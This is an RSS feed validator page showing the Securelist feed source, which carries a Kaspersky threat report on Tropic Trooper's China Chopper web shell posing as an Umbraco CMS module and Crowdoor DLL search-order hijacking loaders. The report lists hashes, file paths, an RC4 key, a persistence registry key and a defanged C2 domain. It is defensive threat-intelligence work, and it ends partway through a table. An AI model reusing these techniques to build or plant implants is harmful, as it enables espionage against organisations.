Congratulations!

[Valid RSS] This is a valid RSS feed.

Recommendations

This feed is valid, but interoperability with the widest range of feed readers could be improved by implementing the following recommendations.

Source: http://securelist.com/feed/

  1. <?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
  2. xmlns:content="http://purl.org/rss/1.0/modules/content/"
  3. xmlns:wfw="http://wellformedweb.org/CommentAPI/"
  4. xmlns:dc="http://purl.org/dc/elements/1.1/"
  5. xmlns:atom="http://www.w3.org/2005/Atom"
  6. xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
  7. xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
  8. >
  9.  
  10. <channel>
  11. <title>Securelist</title>
  12. <atom:link href="https://securelist.com/feed/" rel="self" type="application/rss+xml" />
  13. <link>https://securelist.com</link>
  14. <description></description>
  15. <lastBuildDate>Thu, 05 Sep 2024 08:02:16 +0000</lastBuildDate>
  16. <language>en-US</language>
  17. <sy:updatePeriod>
  18. hourly </sy:updatePeriod>
  19. <sy:updateFrequency>
  20. 1 </sy:updateFrequency>
  21. <generator>https://wordpress.org/?v=6.5.5</generator>
  22.  
  23. <image>
  24. <url>https://securelist.com/wp-content/themes/securelist2020/assets/images/content/site-icon.png</url>
  25. <title>Securelist</title>
  26. <link>https://securelist.com</link>
  27. <width>32</width>
  28. <height>32</height>
  29. </image>
  30. <item>
  31. <title>Tropic Trooper spies on government entities in the Middle East</title>
  32. <link>https://securelist.com/new-tropic-trooper-web-shell-infection/113737/</link>
  33. <comments>https://securelist.com/new-tropic-trooper-web-shell-infection/113737/#respond</comments>
  34. <dc:creator><![CDATA[Sherif Magdy]]></dc:creator>
  35. <pubDate>Thu, 05 Sep 2024 08:00:12 +0000</pubDate>
  36. <category><![CDATA[Malware descriptions]]></category>
  37. <category><![CDATA[APT]]></category>
  38. <category><![CDATA[Backdoor]]></category>
  39. <category><![CDATA[Chinese-speaking cybercrime]]></category>
  40. <category><![CDATA[DLL]]></category>
  41. <category><![CDATA[DLL hijacking]]></category>
  42. <category><![CDATA[Malware]]></category>
  43. <category><![CDATA[Malware Descriptions]]></category>
  44. <category><![CDATA[Malware Technologies]]></category>
  45. <category><![CDATA[Open source]]></category>
  46. <category><![CDATA[Pentest]]></category>
  47. <category><![CDATA[web shell]]></category>
  48. <category><![CDATA[APT (Targeted attacks)]]></category>
  49. <category><![CDATA[Web threats]]></category>
  50. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=113737</guid>
  51.  
  52. <description><![CDATA[Kaspersky experts found a new variant of the China Chopper web shell from the Tropic Trooper group that imitates an Umbraco CMS module and targets a government entity in the Middle East.]]></description>
  53. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/05071424/tropic-trooper-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><h2 id="executive-summary">Executive summary</h2>
  54. <p>Tropic Trooper (also known as KeyBoy and Pirate Panda) is <a href="https://documents.trendmicro.com/assets/wp/wp-operation-tropic-trooper.pdf" target="_blank" rel="noopener">an APT group</a> active since 2011. This group has traditionally targeted sectors such as government, healthcare, transportation and high-tech industries in Taiwan, the Philippines and Hong Kong. Our recent investigation has revealed that in 2024 they conducted persistent campaigns targeting a government entity in the Middle East, starting in June 2023.</p>
  55. <p>Sighting this group&#8217;s TTPs in critical governmental entities in the Middle East, particularly those related to human rights studies, marks a new strategic move for them. This can help the threat intelligence community better understand the motives of this threat actor.</p>
  56. <p>The infection came to our attention in June 2024, when our telemetry gave recurring alerts for a new China Chopper web shell variant (used by many Chinese-speaking actors), which was found on a public web server. The server was hosting an open-source content management system (CMS) called Umbraco, written in C#. The observed web shell component was compiled as a .NET module of Umbraco CMS.</p>
  57. <p>In our subsequent investigation, we looked for more suspicious detections on this public server and identified multiple malware sets. These include post-exploitation tools, which, we assess with medium confidence, are related to and leveraged in this intrusion.</p>
  58. <p>Furthermore, we identified new DLL search-order hijacking implants that are loaded from a legitimate vulnerable executable as it lacks the full path specification to the DLL it needs. This attack chain was attempting to load <a href="https://www.virusbulletin.com/conference/vb2023/abstracts/unveiling-activities-tropic-trooper-2023-deep-analysis-xiangoop-loader-and-entryshell-payload" target="_blank" rel="noopener">the Crowdoor loader</a>, which is half-named after the SparrowDoor backdoor, <a href="https://www.welivesecurity.com/2021/09/23/famoussparrow-suspicious-hotel-guest/" target="_blank" rel="noopener">detailed by ESET</a>. During the attack, the security agent blocked the first Crowdoor loader, prompting the attackers to switch to a new, previously unreported variant, with almost the same impact.</p>
  59. <p>We attribute this activity to the Chinese-speaking threat actor known as Tropic Trooper with high confidence. Our findings reveal an overlap in the techniques reported in <a href="https://www.virusbulletin.com/conference/vb2023/abstracts/unveiling-activities-tropic-trooper-2023-deep-analysis-xiangoop-loader-and-entryshell-payload" target="_blank" rel="noopener">recent Tropic Trooper campaigns</a>. The samples we found also show a high overlap with samples previously attributed to Tropic Trooper.</p>
  60. <h2 id="background">Background</h2>
  61. <p>In June 2024, we detected a new version of the well-known China Chopper web shell. Further investigation followed as it represents a module within Umbraco CMS, receiving commands via the Umbraco controller.</p>
  62. <p>On the same public server hosting Umbraco, we found other suspicious implants and malware clusters, which appeared to be part of the same attack. The installed security agent kept detecting these malware implants, and the attackers tried to drop additional post-exploitation tools to achieve their main objectives: in this intrusion we assess with high confidence that the motive is cyber espionage.</p>
  63. <p>The table below shows the discovered malware families related to this intrusion. The subsequent sections of this report provide a technical analysis of these malware clusters.</p>
  64. <table width="100%">
  65. <tbody>
  66. <tr>
  67. <td width="20%"><strong>Malware Set</strong></td>
  68. <td width="40%"><strong>Description</strong></td>
  69. <td width="15%"><strong>Oldest Variant</strong></td>
  70. <td width="15%"><strong>Earliest Variant</strong></td>
  71. <td width="10%"><strong>Sample Count</strong></td>
  72. </tr>
  73. <tr>
  74. <td>1 &#8211; Web shells</td>
  75. <td>.NET Web shells found dropped into path<br />
  76. <pre class="crayon-plain-tag">c:\microsoft.net\framework64\v4.0.30319\temporary asp.net files\root</pre>
  77. with filename similar to this pattern<br />
  78. <pre class="crayon-plain-tag">App_Web_{8}[a-z0-9].dll</pre></td>
  79. <td>2023.08.25</td>
  80. <td>2024.04.18</td>
  81. <td>37</td>
  82. </tr>
  83. <tr>
  84. <td>2 &#8211; Post-exploitation tools</td>
  85. <td>Multiple post-exploitation tools dropped<br />
  86. into path<br />
  87. <pre class="crayon-plain-tag">c:\sql\tools\attunitycdcoracle\x64\1033</pre>
  88. Main usage: network scanning, lateral<br />
  89. movement, defense evasion<br />
  90. Main tools: Fscan, Swor and batch scripts</td>
  91. <td>2024.05.07</td>
  92. <td>2024.05.08</td>
  93. <td>5</td>
  94. </tr>
  95. <tr>
  96. <td>3 &#8211; DLL search-order hijacking implants – Crowdoor loaders</td>
  97. <td>Multiple malicious DLLs, side-loaded into<br />
  98. other legitimate executables, dropped into<br />
  99. paths <pre class="crayon-plain-tag">c:\Windows\branding\data</pre> and<br />
  100. <pre class="crayon-plain-tag">c:\Users\Public\Music\data</pre>
  101. The malicious samples are called Crowdoor,<br />
  102. which, when run, drop CobaltStrike and<br />
  103. maintain persistence.</td>
  104. <td>2024.04.18</td>
  105. <td>2024.05.15</td>
  106. <td>5</td>
  107. </tr>
  108. </tbody>
  109. </table>
  110. <h2 id="technical-details">Technical details</h2>
  111. <h3 id="webshells-umbraco-modules">Webshells — Umbraco modules</h3>
  112. <table width="100%">
  113. <tbody>
  114. <tr>
  115. <td width="20%">MD5</td>
  116. <td width="80%"><a href="https://opentip.kaspersky.com/3F15C4431AD4573344AD56E8384EBD62/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______795309577e185eac&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">3f15c4431ad4573344ad56e8384ebd62</a></td>
  117. </tr>
  118. <tr>
  119. <td>Sha-1</td>
  120. <td>311d1d50673fbfc40b84d94239cd4fa784269465</td>
  121. </tr>
  122. <tr>
  123. <td>Sha256</td>
  124. <td>8df9fa495892fc3d183917162746ef8fd9e438ff0d639264236db553b09629dc</td>
  125. </tr>
  126. <tr>
  127. <td>Link-Time</td>
  128. <td>2024-05-06 10:19:28</td>
  129. </tr>
  130. <tr>
  131. <td>File Type</td>
  132. <td>dynamic-link-library, 32-bit, console / Microsoft Visual C# / Basic .NET | Microsoft.NET</td>
  133. </tr>
  134. <tr>
  135. <td>File Name</td>
  136. <td>App_Web_dentsd54.dll</td>
  137. </tr>
  138. </tbody>
  139. </table>
  140. <p>The module exhibits characteristics commonly associated with malicious activity, including obfuscation and dynamic execution of commands. The commands are received and dispatched by the <pre class="crayon-plain-tag">umbraco_bind_aspx</pre> module, as can be seen below.</p>
  141. <div id="attachment_113748" style="width: 377px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164304/new_tropic_trooper_web_shell_infection_01.png" class="magnificImage"><img fetchpriority="high" decoding="async" aria-describedby="caption-attachment-113748" class="size-full wp-image-113748" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164304/new_tropic_trooper_web_shell_infection_01.png" alt="Malicious module found inside Umbraco CMS on the compromised server" width="367" height="461" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164304/new_tropic_trooper_web_shell_infection_01.png 367w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164304/new_tropic_trooper_web_shell_infection_01-239x300.png 239w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164304/new_tropic_trooper_web_shell_infection_01-279x350.png 279w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164304/new_tropic_trooper_web_shell_infection_01-223x280.png 223w" sizes="(max-width: 367px) 100vw, 367px" /></a><p id="caption-attachment-113748" class="wp-caption-text">Malicious module found inside Umbraco CMS on the compromised server</p></div>
  142. <p>The <pre class="crayon-plain-tag">umbraco_bind_aspx</pre> is a class generated by the ASP.NET framework for an ASPX page within Umbraco CMS. The framework automatically calls the <pre class="crayon-plain-tag">__BuildControlTree()</pre> function. This function, implemented by the attackers, is responsible for calling malicious code as the argument to the <pre class="crayon-plain-tag">RenderMethod()</pre> function. Also, event validation, which is a security feature in ASP.NET that prevents unauthorized events from being logged on the server, is disabled by setting <pre class="crayon-plain-tag">EnableEventValidation</pre> to <pre class="crayon-plain-tag">false</pre> as can be seen in the screenshot below.</p>
  143. <div id="attachment_113749" style="width: 646px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164358/new_tropic_trooper_web_shell_infection_02.png" class="magnificImage"><img decoding="async" aria-describedby="caption-attachment-113749" class="size-full wp-image-113749" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164358/new_tropic_trooper_web_shell_infection_02.png" alt="Malicious function implementing China Chopper registered as a callback function" width="636" height="176" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164358/new_tropic_trooper_web_shell_infection_02.png 636w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164358/new_tropic_trooper_web_shell_infection_02-300x83.png 300w" sizes="(max-width: 636px) 100vw, 636px" /></a><p id="caption-attachment-113749" class="wp-caption-text">Malicious function implementing China Chopper registered as a callback function</p></div>
  144. <pre class="crayon-plain-tag">__Render__control1()</pre> is the main malicious function. As can be seen in the screenshot below, a Base64 string is decoded and then executed via dynamic evaluation using JavaScript.</p>
  145. <div id="attachment_113750" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164441/new_tropic_trooper_web_shell_infection_03.png" class="magnificImage"><img decoding="async" aria-describedby="caption-attachment-113750" class="size-large wp-image-113750" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164441/new_tropic_trooper_web_shell_infection_03-1024x974.png" alt="Obfuscated dynamic JS code execution" width="1024" height="974" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164441/new_tropic_trooper_web_shell_infection_03-1024x974.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164441/new_tropic_trooper_web_shell_infection_03-300x285.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164441/new_tropic_trooper_web_shell_infection_03-768x731.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164441/new_tropic_trooper_web_shell_infection_03-368x350.png 368w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164441/new_tropic_trooper_web_shell_infection_03-740x704.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164441/new_tropic_trooper_web_shell_infection_03-294x280.png 294w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164441/new_tropic_trooper_web_shell_infection_03-800x761.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164441/new_tropic_trooper_web_shell_infection_03.png 1447w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-113750" class="wp-caption-text">Obfuscated dynamic JS code execution</p></div>
  146. <p>The script employs multiple Base64 decodings before the final JavaScript payload is generated and executed. The resulting code resembles the known functionality associated with the China Chopper web shell, a popular web shell used by attackers for remote access and control over compromised web servers.</p>
  147. <div id="attachment_113752" style="width: 562px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164641/new_tropic_trooper_web_shell_infection_04-1.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113752" class="size-full wp-image-113752" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164641/new_tropic_trooper_web_shell_infection_04-1.png" alt="China Chopper web shell functionality" width="552" height="166" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164641/new_tropic_trooper_web_shell_infection_04-1.png 552w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164641/new_tropic_trooper_web_shell_infection_04-1-300x90.png 300w" sizes="(max-width: 552px) 100vw, 552px" /></a><p id="caption-attachment-113752" class="wp-caption-text">China Chopper web shell functionality</p></div>
  148. <p>The attackers then started dropping various samples on this server, notably a dropper that was pushing more compiled variants carrying the same functionality, but using different module names. These module names all match the pattern <pre class="crayon-plain-tag">App_Web_{8}[a-z0-9].dll</pre>. In our telemetry, we noticed exploitation attempts of several CVEs (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207 in Microsoft Exchange, CVE-2023-26360 in Adobe ColdFusion). Therefore, we believe with moderate confidence that these web shells were dropped by exploiting an existing unpatched vulnerability.</p>
  149. <p>According to the timeline of the detection logs, the attackers were able to leverage some of these web shells to execute commands on the affected server and drop more post-exploitation tools utilized for lateral movement. The majority of observed software are open-source tools maintained by Chinese-speaking developers. These implants are dropped into the Umbraco CMS root directory.</p>
  150. <p>We found the following tools:</p>
  151. <ul>
  152. <li><a href="https://github.com/shadow1ng/fscan/" target="_blank" rel="noopener"><strong>Fscan</strong></a>: A tool for vulnerability scanning including host status detection, port scanning, service enumeration, exploitation, etc. The tool documentation is in simplified Chinese and maintained by Chinese-speaking accounts. The attackers created a script, named <pre class="crayon-plain-tag">i.bat</pre>, to identify available machines on the network using simple ICMP ping requests. The output is directed to a text file, which is used later for lateral movement.</li>
  153. <li><strong>Swor: </strong>A simple penetration testing tool whose author tried to make it immune to removal by security solutions. Based on its documentation, it can deploy mimikatz, FRP and ElevationStation. The tool is open-source and maintained by Chinese-speaking developers. This tool was previously sighted being leveraged in attacks on government entities in Malaysia, which is a similar industry vertical to the Middle East intrusion victimology. We found the same compiled sample in the wild at <pre class="crayon-plain-tag">[domain]/wampthemes/simple/123/In-Swor-v2/1.exe</pre>.</li>
  154. <li><a href="https://github.com/L-codes/Neo-reGeorg/tree/master" target="_blank" rel="noopener"><strong>Neo-reGeorg</strong></a>: An open-source SOCKS5 proxy, the attackers used it to pivot to other machines and evade network-level security controls. Some detections suggest that this tool may be used to proxy traffic, but we have not been able to verify the actual purpose of proxying traffic through this server.</li>
  155. <li><strong>ByPassGodzilla: </strong>A Chinese web shell encryptor used to obfuscate other deployed web shells to bypass detections. We were able to source different implementations of encrypted web shells in .NET and ASPX scripts from the same server. According to our telemetry, the newly discovered web shell was also associated with a campaign leveraging CVE-2023-26360 early this year targeting vulnerable servers in the Middle East.</li>
  156. </ul>
  157. <h3 id="backdoor-implants-using-dll-search-order-hijacking">Backdoor implants using DLL search-order hijacking</h3>
  158. <p>The attackers tried to load a malicious DLL, <pre class="crayon-plain-tag">datast.dll</pre>, from <pre class="crayon-plain-tag">c:\Users\Public\Music\data</pre> three times. After these attempts failed, the attackers relied on another malicious loader, <pre class="crayon-plain-tag">VERSION.dll</pre>, which was dropped into <pre class="crayon-plain-tag">C:\Windows\branding\data</pre>. We discuss this below in the &#8220;New samples&#8221; section. We believe, based on our telemetry, that the Umbraco web shells were used to drop these files on the infected server.</p>
  159. <p>Since the timeframe for loading the two malicious DLLs, <pre class="crayon-plain-tag">VERSION.dll</pre> and <pre class="crayon-plain-tag">datast.dll</pre>, were very close, it allowed us to link the two files. Additionally, the same approach was used for both: leveraging a legitimate executable file vulnerable to DLL search-order hijacking, which would load a malicious DLL dropped into the same path as the legitimate executable.</p>
  160. <h4 id="the-datast-dll-library">The datast.dll library</h4>
  161. <table width="100%">
  162. <tbody>
  163. <tr>
  164. <td width="20%">MD5</td>
  165. <td width="80%"><a href="https://opentip.kaspersky.com/A213873EB55DC092DDF3ADBEB242BD44/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______24243399edf45b8a&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">a213873eb55dc092ddf3adbeb242bd44</a></td>
  166. </tr>
  167. <tr>
  168. <td>Sha-1</td>
  169. <td>3650899c669986e5f4363fdbd6cf5b78a6fcd484</td>
  170. </tr>
  171. <tr>
  172. <td>Sha256</td>
  173. <td>23dea3a74e3ff6a367754d02466db4c86ffda47efe09529d3aad52b0d5694b30</td>
  174. </tr>
  175. <tr>
  176. <td>Link-Time</td>
  177. <td>Thu Jul 27 16:21:38 2023 (UTC)</td>
  178. </tr>
  179. <tr>
  180. <td>File Type</td>
  181. <td>dynamic-link-library | 32-bit</td>
  182. </tr>
  183. <tr>
  184. <td>File Name</td>
  185. <td>datast.dll</td>
  186. </tr>
  187. </tbody>
  188. </table>
  189. <p>In this incident, our telemetry points to the malware export being called using the rundll32 command from the <pre class="crayon-plain-tag">a.bat</pre> file (MD5: fca94b8b718357143c53620c6b360470), which we were unable to obtain. A second assumption is that it was loaded through a legitimate executable using DLL search-order hijacking, as <pre class="crayon-plain-tag">datast.dll</pre> has been observed before, associated with Tropic Trooper and loaded by the same method. We believe with low to medium confidence that the batch script was merely used for testing purposes as the whole malware-loading chain was designed to be loaded from a legitimate executable.</p>
  190. <p>Once loaded, <pre class="crayon-plain-tag">datast.dll</pre> exports a single function named <pre class="crayon-plain-tag">InitCore</pre>. This function usually gets imported by another DLL called <pre class="crayon-plain-tag">datastate.dll</pre>. The function implements the main functionality for this loader, decrypting the shellcode for the next stage from a memory buffer inside the <pre class="crayon-plain-tag">datastate.dll</pre> file using a variant of the RC4 stream cipher. The first code block is the Key Scheduling Algorithm (KSA), while the second block (the &#8220;for&#8221; loop in the image below) is the core of the KSA, where it scrambles the initial permutation using the hardcoded RC4 key <pre class="crayon-plain-tag">fYTUdr643$3u</pre>.</p>
  191. <div id="attachment_113753" style="width: 496px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04165422/new_tropic_trooper_web_shell_infection_05.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113753" class="size-full wp-image-113753" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04165422/new_tropic_trooper_web_shell_infection_05.png" alt="Code stub responsible for decrypting the next stage" width="486" height="398" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04165422/new_tropic_trooper_web_shell_infection_05.png 486w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04165422/new_tropic_trooper_web_shell_infection_05-300x246.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04165422/new_tropic_trooper_web_shell_infection_05-427x350.png 427w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04165422/new_tropic_trooper_web_shell_infection_05-342x280.png 342w" sizes="(max-width: 486px) 100vw, 486px" /></a><p id="caption-attachment-113753" class="wp-caption-text">Code stub responsible for decrypting the next stage</p></div>
  192. <p><strong>Code stub responsible for decrypting the next stage</strong></p>
  193. <p>After decryption, the shellcode is executed, then the next stage is loaded into the address space of the process that loaded <pre class="crayon-plain-tag">datast.dll</pre>.</p>
  194. <h2 id="hunting-for-new-loaders">Hunting for new loaders</h2>
  195. <p>As mentioned, the infection chain was not fully executed, forcing the attackers to shift to new undetected variants. By pivoting on the hardcoded RC4 key, we found a new set of files sharing similar code, which turned out to be new updated variants of this family with minor differences in functionality. Below is the chronological view of the evolution of this specific loader as observed from our telemetry and scanning third-party malware repositories.</p>
  196. <table width="100%">
  197. <tbody>
  198. <tr>
  199. <td width="40%"><strong>MD5 hashes</strong></td>
  200. <td width="15%"><strong>File name</strong></td>
  201. <td width="15%"><strong>Exported functions</strong></td>
  202. <td width="15%"><strong>File creation date</strong></td>
  203. <td width="15%"><strong>Size</strong></td>
  204. </tr>
  205. <tr>
  206. <td><a href="https://opentip.kaspersky.com/FD8382EFB0A16225896D584DA56C182C/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______1466f636dc038ceb&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">fd8382efb0a16225896d584da56c182c</a></td>
  207. <td>datastate.dll</td>
  208. <td>Clear &#8211; Server</td>
  209. <td>2024-02-23</td>
  210. <td>81KB</td>
  211. </tr>
  212. <tr>
  213. <td><a href="https://opentip.kaspersky.com/1DD03936BAF0FE95B7E5B54A9DD4A577/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______8a465f2128983aef&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">1dd03936baf0fe95b7e5b54a9dd4a577</a></td>
  214. <td>datast.dll</td>
  215. <td>Ldf/rcd</td>
  216. <td>2024-02-23</td>
  217. <td>80KB</td>
  218. </tr>
  219. <tr>
  220. <td><a href="https://opentip.kaspersky.com/8A900F742D0E3CD3898F37DBC3D6E054/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______82e090652b08f023&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">8a900f742d0e3cd3898f37dbc3d6e054</a></td>
  221. <td>NA</td>
  222. <td>Clear &#8211; Server</td>
  223. <td>2023-10-30</td>
  224. <td>80kB</td>
  225. </tr>
  226. <tr>
  227. <td><a href="https://opentip.kaspersky.com/A213873EB55DC092DDF3ADBEB242BD44/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______24243399edf45b8a&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">a213873eb55dc092ddf3adbeb242bd44</a></td>
  228. <td>datast.dll</td>
  229. <td>InitCore</td>
  230. <td>2023-07-21</td>
  231. <td>178KB</td>
  232. </tr>
  233. <tr>
  234. <td><a href="https://opentip.kaspersky.com/DD7593E9BA80502505C958B9BBBF2838/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______4ef4987adedc8b9c&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">dd7593e9ba80502505c958b9bbbf2838</a></td>
  235. <td>datastate.dll</td>
  236. <td>Clear &#8211; Server</td>
  237. <td>2023-03-22</td>
  238. <td>178KB</td>
  239. </tr>
  240. <tr>
  241. <td><a href="https://opentip.kaspersky.com/2C7EBD103514018BAD223F25026D4DB3/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______10ebee13da5572e5&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">2c7ebd103514018bad223f25026d4db3</a></td>
  242. <td>datastate.dll</td>
  243. <td>Clear &#8211; Server</td>
  244. <td>2023-03-10</td>
  245. <td>81KB</td>
  246. </tr>
  247. </tbody>
  248. </table>
  249. <h2 id="recent-variants">Recent variants</h2>
  250. <h3 id="updated-loader-variant-in-february-2024">Updated loader variant in February 2024</h3>
  251. <p>In February 2024, a user uploaded three Crowdoor-related files to a multiscanner platform:</p>
  252. <table width="100%">
  253. <tbody>
  254. <tr>
  255. <td width="25%"><strong>File name</strong></td>
  256. <td width="40%"><strong>MD5 hash</strong></td>
  257. <td width="35%"><strong>Description</strong></td>
  258. </tr>
  259. <tr>
  260. <td>datastate.dll</td>
  261. <td><a href="https://opentip.kaspersky.com/FD8382EFB0A16225896D584DA56C182C/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______1466f636dc038ceb&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">fd8382efb0a16225896d584da56c182c</a></td>
  262. <td>Malicious loader DLL</td>
  263. </tr>
  264. <tr>
  265. <td>datast.dll</td>
  266. <td><a href="https://opentip.kaspersky.com/1DD03936BAF0FE95B7E5B54A9DD4A577/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______8a465f2128983aef&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">1dd03936baf0fe95b7e5b54a9dd4a577</a></td>
  267. <td>Utility DLL used by datastate.dll</td>
  268. </tr>
  269. <tr>
  270. <td>WinStore</td>
  271. <td>c10643b3fb304972c650e593b69faaa1</td>
  272. <td>Encrypted shellcode payload file</td>
  273. </tr>
  274. </tbody>
  275. </table>
  276. <p>These files are also involved in a DLL search-order hijacking sequence:</p>
  277. <ol>
  278. <li>A legitimate executable loads a vulnerable DLL (<pre class="crayon-plain-tag">datastate.dll</pre>);</li>
  279. <li>This DLL then loads a malicious Crowdoor DLL (<pre class="crayon-plain-tag">datast.dll</pre>);</li>
  280. <li>The loader DLL uses this malicious DLL to decrypt and load the Crowdoor payload.</li>
  281. </ol>
  282. <p>This method is hard to detect since the malicious functions are split across two DLLs, which mostly perform seemingly benign tasks, such as reading files or decrypting RC4 data. Both DLLs have build timestamps future-dating them to 26 May 2027.</p>
  283. <p>The <pre class="crayon-plain-tag">datastate.dll</pre> loader imports two functions from <pre class="crayon-plain-tag">datast.dll</pre> — one called <pre class="crayon-plain-tag">rcd</pre> (likely &#8220;run code&#8221;) to execute the shellcode and another called <pre class="crayon-plain-tag">ldf</pre> (likely &#8220;load file&#8221;) to read content from a file that is named after a legitimate executable but without the file extension. In this case, the payload file uploaded is named WinStore, meaning the legitimate executable is <pre class="crayon-plain-tag">WinStore.exe</pre>. The loader uses the RC4 key <pre class="crayon-plain-tag">fYTUdr643$3u</pre>, the same key as found in the initial sample discussed in the previous section, to decrypt the payload file containing the same Crowdoor shellcode.</p>
  284. <p>The Crowdoor payload from this chain stays active by creating a Windows service named WinStore, which is used as the service name, display name and description. If creation of the service fails, the payload uses the registry auto-start extensibility point (ASEP) at <pre class="crayon-plain-tag">HKCU\Software\Microsoft\Windows\CurrentVersion\Run</pre> with the value <pre class="crayon-plain-tag">WinStore</pre> to persist.</p>
  285. <p>When executed, it injects itself into the <pre class="crayon-plain-tag">colorcpl.exe</pre> process with the command-line argument &#8220;2&#8221; and tries to contact a C2 server that is hardcoded in the payload using its configuration (blog.techmersion[.]com on port 443).</p>
  286. <p>We compared the collected samples with the reference sample (MD5: a213873eb55dc092ddf3adbeb242bd44) and revealed a degree of code similarity in them. For example, the core functions responsible for loading the next stage are almost identical. Based on this, we believe with medium confidence that the newly found samples are related to Tropic Trooper, the same actor behind the Middle East intrusion.</p>
  287. <p>The actor has likely been using this search-order hijacking technique since at least June 2022, which marks the first known instance of a malicious DLL being loaded through a vulnerable executable using this method, according to our telemetry. Tropic Trooper employs this technique to split the malicious code across several stages. In the first stage, only the extraction of the next stage, which was encrypted with the same RC4 key, occurs. Subsequently, the actual loader for the final implant is deployed.</p>
  288. <h3 id="new-samples">New samples</h3>
  289. <p>We investigated the second attempt made by the threat actor after failing to load the previously covered loader. The actor uploaded new samples detailed in the table below:</p>
  290. <table width="100%">
  291. <tbody>
  292. <tr>
  293. <td width="30%"><strong>MD5 Hash</strong></td>
  294. <td width="15%"><strong>File name </strong></td>
  295. <td width="25%"><strong>File path</strong></td>
  296. <td width="15%"><strong>File creation date</strong></td>
  297. <td width="15%"><strong>Compilation timestamps</strong></td>
  298. </tr>
  299. <tr>
  300. <td><a href="https://opentip.kaspersky.com/E845563BA35E8D227152165B0C3E769F/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______3b8215c376fe077a&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">e845563ba35e8d227152165b0c3e769f</a> (variant 1)</td>
  301. <td>VERSION.dll</td>
  302. <td>c:\Windows\branding\data</td>
  303. <td>2024.04.28</td>
  304. <td>Tue Jun 10 10:39:52 2025 (UTC)</td>
  305. </tr>
